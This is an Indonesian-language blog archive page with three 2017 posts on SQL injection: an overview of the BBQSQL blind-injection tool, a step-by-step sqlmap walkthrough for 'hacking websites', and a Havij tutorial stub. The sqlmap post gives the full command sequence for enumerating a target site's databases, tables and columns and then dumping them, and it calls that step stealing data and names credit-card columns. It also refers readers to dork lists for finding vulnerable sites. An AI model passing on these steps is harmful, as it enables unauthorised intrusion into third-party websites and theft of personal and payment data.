Tampilkan postingan dengan label SQL. Tampilkan semua postingan
Tampilkan postingan dengan label SQL. Tampilkan semua postingan

Jumat, 23 Juni 2017

BBQSQL - Tool Untuk Eksploitasi Blind SQL Injection 2017

 
Sumber: Linuxsec.org

BBQSQL adalah alat yang dapat digunakan untuk membantu eksekusi ketika kalian melakukan audit server dan menemukan celah Blind SQL. Tool ini merupakan blind SQL injection framework yang ditulis menggunakan bahasa python.  BBQSQL juga merupakan alat semi-otomatis, yang memungkinkan sedikit kustomisasi. 
BBQSQL
Instalasi BBQSQL :
sudo pip install bbqsql

Seperti tool injeksi lain dimana kita harus menginputkan value tertentu sebelum melakukan injeksi, kita juga harus menginputkan informasi berikut pada bbqsql :

  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

BBQSQL Options
Query Syntax

  • ${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
  • ${char_index}: This tells bbqSQL which character from the subselect to query.
  • ${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
  • ${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
  • ${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.

Technique
Ada dua teknik yang bisa dipakai dalam BBQSQL yaitu binary_search atau frequency_search sebagai parameternya.

HTTP Parameters
BBQSQL memiliki banyak parameter http. Kalian dapat mengkonfigurasi sebelum  melakukan eksekusi.
Berikut pilihan yang dapat disetting :

  • files - Provide files to be sent with the request
  • headers - HTTP headers to be sent with the requests
  • cookies - A dictionary or string of cookies to be sent with the request
  • url - Specify a url that the requests should be sent to.
  • allow_redirects - This is a boolean that determines wether http redirects will be follwed when making requests.
  • proxies - Specify an http proxy to be used for the request as a dictionary.
  • data - Specify post data to be sent along with the request.
  • method - Specify the method for the http request.
  • auth - Specify a tuple of username and password to be used for http basic authentication.

Untuk keterangan lain bisa kalian baca sendiri di halaman github mereka :



Mudah Bukan? Terima Kasih sudah mampir, bila ada kekurangan mohon maafkan
Sekian dan terima kasih , SEMOGA SUKSES ! 

Cara Hack Website SQL Dengan Menggunakan SQLMAP Di Windows 7


Asalamualaikum WRB. yaps masih dengan saya admin dari p3juboco tricks
Pada Kesempatan kali ini mimin ingin Share Kepada Kalian semua
Cara Hack Website SQL Dengan Menggunakan SQLMAP Di Windows 7
--------------------------------------------------------------------------------------------
Jika Teman" Belum Install SQLMAP nya di windows
Lihat Vidio Saya yg Di Bawah ini
============================================================
Jika Sudah Install SQLMAP nya , Langsung Aja Cara Hack Web nya
Dengan Cara Lihat Vidio Saya yg Di bawah ini


1Tulis di SQLMAP yg sudah ada windows agan dengan cara
sqlmap.py -u http://target.com/enlarged.php?PID=7 --dbs

2 Setelah Mendapatkan Database si website , tulis lagi
sqlmap.py -u http://targetkamu.com/enlarged.php?PID=7 -D namadatabase target kamu --tables
Untuk Mencari Tables di database target kamu

3 Setelah Mendapatkan Tables si target kamu , kita cari data di tables target kamu
sqlmap.py -u http://targetkamu.com/enlarged.php?PID=7 -D namadatabase target kamu -T nama tables target kamu --columns

4 setelah mendapatkan isi data tables si target kamu , langsung saja kita dump nya atau bisa di sebut mencuri data nya

sqlmap.py -u http://targetkamu.com/enlarged.php?PID=7 -D namadatabase target kamu -T nama tables target kamu -C namacolumnstargetkamu,creditcardtargetkamu --dump

5 nah selesai deh, mudah bukan ? yaps jika kamu ingin website website vuln saya sudah menyiapkan dorknya di bawah ini

BACA JUGA ---> DORK TERBARU 2017
Mudah Bukan? Terima Kasih sudah mampir, bila ada kekurangan mohon maafkan
Sekian dan terima kasih , SEMOGA SUKSES !  

Cara Hack Web SQL Dengan Menggunakan Havij dan Dengan Dork Terbaru 2017


Asalamualaikum WRB. yaps masih dengan saya admin dari p3juboco tricks
Pada Kesempatan kali ini mimin ingin Share Kepada Kalian semua
Cara Hack WEB SQL Dengan Menggunakan Havij and
Dork Terbaru 2017 versi p3jub0c05
-----------------------------------------------------------------------------------------------------------------------------------
Langsung Aje Lihat Tutorial Saya yg Di Bawah ini


-------------------------------------------------

Mudah Bukan? Terima Kasih sudah mampir, bila ada kekurangan mohon maafkan
Sekian dan terima kasih , SEMOGA SUKSES !